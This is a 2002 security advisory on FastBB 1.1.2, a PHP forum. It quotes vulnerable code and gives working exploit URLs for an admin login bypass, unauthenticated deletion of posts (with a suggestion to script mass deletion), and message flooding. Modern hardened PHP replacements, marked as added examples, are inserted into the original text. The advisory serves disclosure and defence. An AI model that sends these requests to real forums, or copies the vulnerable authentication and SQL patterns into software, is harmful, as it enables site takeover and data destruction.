
FastBB version 1.1.2 multiple vulnerabilities


Overview


Multiple vulnerabilities in FastBB version 1.1.2
Discovered on December 5th, 2002, updated on January 1st, 2003
Vendor: FastBB

FastBB 1.1.2 is a PHP forum. It has 3 different vulnerabilities:

Risk


Exploit easiness: 5/5
Vulnerability spreading: 1/5
Impact: 5/5
Risk: 3/5

Details



Admin access without password



The admin web page is admin_.php.
Here is a sample of the admin authentication code in this admin_.php:

<? require("config.php");

$db=mysql_connect("localhost",$login_compte,$pass_compte);
mysql_select_db($nom_bdd,$db);

// administrator identification (login form)
if ($p=="identification")
{
  echo "<center><form action='admin_.php?p=auth' method=post>\n";
  echo "<table><tr><td>Login</td><td><input type=text name=login></td></tr>\n";
  echo "<tr><td>Password</td><td><input type=text name=pass></td></tr></table>\n";
  echo "<input type=submit value=entrée></form>\n";
}

// redirection according to the result of the identification
if ($p=="auth")
{
  if (($login!="toto")or($pass!="toto"))
  {
    echo "<center><h4>Authentification incorrecte, recommencez !!</h4><a href='javascript:history.back()'>Retour</a></center>";
  }
  else
  {
    echo "<center><h4>Authentification réussie</h4><a href=admin_.php?p=auth_ok>Entrée de l'interface pour suppression des messages</a>";
  }
}

// administration interface
if ($p=="auth_ok")
{
  echo "<center><h4>Bienvenue sur votre<br>interface d'administration</h4>Choisissez le message à supprimer !!</center><br><br>";
  echo "Liste des messages et en-têtes<br><br>";
  ...etc...


If you look carefully, you can see that $p alone drives the authentication scheme: the login and password are only checked in the "auth" step, and nothing records whether that check ever succeeded. This is a security bug: if the $p variable is passed to admin_.php with the value "auth_ok" (the value the successful-login link uses), the script goes straight to the administration web page without any credential check.

Post deletion



The code to erase a post is located in the admin_.php file. Here is the piece of code:
// message deletion
if($p=="eff")
{
  mysql_query("DELETE FROM forum WHERE id = '$num_mess'");
  echo "<center><h4>le message $num_mess a été effacé avec succés</h4><a href=admin_.php?p=auth_ok>Revenir à la liste des messages</a></center>\n";
}

Once again, the $p variable alone selects the deletion action, with no check that the caller is authenticated. The $num_mess variable selects the post to delete.
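The two admin_.php problems above (admin access without password, and post deletion keyed only on $p) share one root cause: the request parameter $p is treated as proof of authentication. The following hardened replacement is an added example, not FastBB's code; it assumes PHP 7 or later with PDO, and that config.php defines $dsn, $db_user, $db_pass, ADMIN_LOGIN and an ADMIN_PASSWORD_HASH created with password_hash() (all of these names are assumptions).

```php
<?php
// Added example (not FastBB's code): hardened admin_.php flow.
// Assumed to come from config.php: $dsn, $db_user, $db_pass, ADMIN_LOGIN, ADMIN_PASSWORD_HASH.
declare(strict_types=1);
require 'config.php';
session_start();

$db = new PDO($dsn, $db_user, $db_pass, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);

// Read request parameters explicitly instead of relying on register_globals.
$p     = $_GET['p'] ?? 'identification';
$login = $_POST['login'] ?? '';
$pass  = $_POST['pass'] ?? '';

// Authentication state lives in the server-side session, never in $p.
$isAdmin = !empty($_SESSION['admin']);

if ($p === 'auth' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (hash_equals(ADMIN_LOGIN, $login) && password_verify($pass, ADMIN_PASSWORD_HASH)) {
        session_regenerate_id(true);               // defeat session fixation
        $_SESSION['admin'] = true;
        $_SESSION['csrf']  = bin2hex(random_bytes(16));
        $isAdmin = true;
    } else {
        http_response_code(403);
        exit('Authentication failed');
    }
}

// Every privileged branch is gated on the session flag, so a bare
// ?p=auth_ok or ?p=eff request without a prior login is refused.
if (($p === 'auth_ok' || $p === 'eff') && !$isAdmin) {
    http_response_code(403);
    exit('Login required');
}

if ($p === 'eff') {
    // Deletion changes state: require POST plus a non-empty, matching CSRF token.
    $token = (string)($_SESSION['csrf'] ?? '');
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || $token === ''
        || !hash_equals($token, (string)($_POST['csrf'] ?? ''))) {
        http_response_code(403);
        exit('Bad request');
    }
    $num_mess = (string)($_POST['num_mess'] ?? '');
    if (!ctype_digit($num_mess)) { http_response_code(400); exit('Bad message id'); }
    // Parameterised query: the id is bound, never interpolated into the SQL text.
    $stmt = $db->prepare('DELETE FROM forum WHERE id = ?');
    $stmt->execute([(int)$num_mess]);
    echo 'Message ' . (int)$num_mess . ' deleted';
}
```

The listing shown for the "auth_ok" branch would follow the same gate; only the deletion branch is written out here because it is the one that changes data.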

Flooding the forum



To post a message, the file forum_ok.php is used. Here is the piece of code:
if(($nom=="")or($titre==""))
{
  echo "<br><br><br><table width=500 align=center cellpadding=3 cellspacing=1 bgcolor=#cccccc><tr><td bgcolor=lightcyan align=center>Merci de remplir les champs <b>nom</b> et <b>sujet</b></center></td></tr></table>";
}

else
{
  mysql_query("insert into forum VALUES('','$date','$nom','$titre','$message','$reply_to','')");
  echo "<br><br><br><table width=500 align=center cellpadding=3 cellspacing=1 bgcolor=#cccccc><tr><td bgcolor=lightcyan align=center><b>message posté !!</b></center></td></tr></table>";
  echo "<script language=javascript>
  {
  window.location=\"forum.php\";
  }
  </script>
  ";
}

As you can see, there is a filter using $nom and $titre. $nom is the nickname and $titre is the title of the post. If either of these variables is not set, the post command is ignored. But if you set $nom and $titre, you can post an empty message, and nothing limits how many messages one client may post.
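A hardened replacement for the forum_ok.php handler above, written as an added example (not FastBB's code): it rejects an empty message as well as an empty name or title, accepts posts only over POST, binds every value instead of interpolating it into the INSERT, and applies a simple per-IP rate limit. Assumptions: PDO with MySQL, config.php defining $dsn, $db_user and $db_pass, a DATETIME date column in the forum table, and an extra table post_log(ip, posted_at) for the rate limit.

```php
<?php
// Added example (not FastBB's code): hardened forum_ok.php.
// Assumed: $dsn, $db_user, $db_pass from config.php; table post_log(ip VARCHAR(45), posted_at DATETIME).
declare(strict_types=1);
require 'config.php';
$db = new PDO($dsn, $db_user, $db_pass, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);

const MAX_POSTS_PER_MINUTE = 3;                                  // assumed policy value
const MAX_LEN = ['nom' => 40, 'titre' => 120, 'message' => 5000]; // assumed limits

// Posting changes state: accept it only over POST, not from a crafted GET URL.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') { http_response_code(405); exit('POST required'); }

// Normalise and validate every field; an empty message is rejected, not only an empty name/title.
$fields = [];
foreach (['nom', 'titre', 'message'] as $f) {
    $v = trim((string)($_POST[$f] ?? ''));
    if ($v === '' || mb_strlen($v) > MAX_LEN[$f]) { http_response_code(400); exit("Invalid field: $f"); }
    $fields[$f] = $v;
}
$reply_to = ctype_digit((string)($_POST['reply_to'] ?? '')) ? (int)$_POST['reply_to'] : 0;

// Per-IP rate limit: count recent posts before accepting a new one.
$ip = $_SERVER['REMOTE_ADDR'];
$stmt = $db->prepare('SELECT COUNT(*) FROM post_log WHERE ip = ? AND posted_at > NOW() - INTERVAL 1 MINUTE');
$stmt->execute([$ip]);
if ((int)$stmt->fetchColumn() >= MAX_POSTS_PER_MINUTE) { http_response_code(429); exit('Too many posts'); }

// Same seven columns as the original INSERT, but every user value is bound.
$db->beginTransaction();
$db->prepare("INSERT INTO forum VALUES (NULL, NOW(), ?, ?, ?, ?, '')")
   ->execute([$fields['nom'], $fields['titre'], $fields['message'], $reply_to]);
$db->prepare('INSERT INTO post_log (ip, posted_at) VALUES (?, NOW())')->execute([$ip]);
$db->commit();

header('Location: forum.php', true, 303); // server-side redirect instead of inline JavaScript
```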

Exploit



Admin access without password



The exploit is really easy. You can do it with any browser by using this syntax:
http://<www.victim.com>/fastbb/admin_.php?p=auth_ok
You will get this page:
[screenshot of the administration interface]



Post deletion




You can do it by hand with any browser by using this syntax:
http://<www.victim.com>/fastbb/admin_.php?p=eff&num_mess=number_of_the_post
You can create a script to delete all posts using num_mess=1 to num_mess=9999999

Flooding the forum




You can do it by hand with any browser by using this syntax:
http://<www.victim.com>/fastbb/forum_ok.php?nom=your_name&titre=title_of_the_post
You can create a script for a maximum flood in a minimum of time...

Solution


The vendor has been informed and told me to delete the admin_.php file to solve the problems.
The vendor has no solution for the flooding.

Discovered by


Arnaud Jacques aka scrap
webmaster@securiteinfo.com
